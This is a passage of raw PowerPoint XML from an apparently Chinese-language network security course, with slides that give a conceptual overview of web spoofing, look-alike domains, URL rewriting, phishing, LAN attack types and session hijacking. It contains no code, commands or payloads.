            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>商业利益，商业竞争，政治目的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗的形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用相似的域名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251906" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E79D13CD-33FE-45CC-92B7-500570A781B8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49323061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19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190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19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19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190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190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190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19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1" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注册与目标公司或组织相似的域名，建立欺骗网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例如，针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公司，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>abc.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来混淆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>abc.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用类似的域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28922149-ED99-45F9-AB2D-B939A9451AFF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>207</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996188204"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造合法站点及其域名，诱骗受害者访问，窃取敏感信息，如银行账户、信用卡信息等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过邮件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站点或搜索引擎进行发布</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包括伪造站点、诱骗访问、掩盖欺骗三个环节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>冒充相关人员，系统管理员、银行客服，发送邮件（包含欺骗站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），诱使受害者访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>站点欺骗技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{93DA9FB5-D2BE-4EDA-BC41-B7A462341FFD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2649499914"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造：伪造合法站点及其域名，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>诱骗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造发件人、模仿合法机构邮件、添加银行标志；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站点或搜索引擎进行发布</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪造链接：隐藏伪造站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>误导链接、隐晦链接、图形链接、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编程改写状态栏，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马监控用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问，替换请求网页</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>掩盖：避免用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问欺骗站点时发现被欺骗，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本掩盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窗口相关区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址栏欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全站点欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造、诱骗、掩盖</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DE314493-4EA2-4550-ADAF-EABB71E0FB0A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="811120334"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>嗅探流量：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>观察网络上所有流量的被动攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广播：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者发送一个信息包到广播地址，以达到产生大量流量的目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件访问：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过找到用户标识和口令，可以对文件进行访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过安装木马实现对机器的远程控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用抢劫：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接收应用并且达到非授权访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在局域网上</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92162" name="灯片编号占位符 1"/>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E3593C18-9E19-4C08-BAD3-8C90B2F25DC9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407906083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027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如假冒中华慈善总会名义骗印度洋海啸捐款，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假冒银联的网站盗取用户密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phishing</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D8E0EAB7-98F3-42A7-9826-C199C54D2B8B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385028" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3505200"/>
            <a:ext cx="4733925" cy="2876550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41467330"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>及参数来进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接指向一些恶意的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改写页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器，修改页面、设置中间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代理、把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定向放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在传输路径上截获页面并改写、在客户端装载后门程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253954" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>及页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3DFC9180-7B8E-47BE-B6DE-E038CD57C941}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31319999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39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539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39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39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4979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无状态，通过唯一的身份标识符（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）来维持客户端与服务端的会话。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取并使用用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，伪装成合法用户登录目标账号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
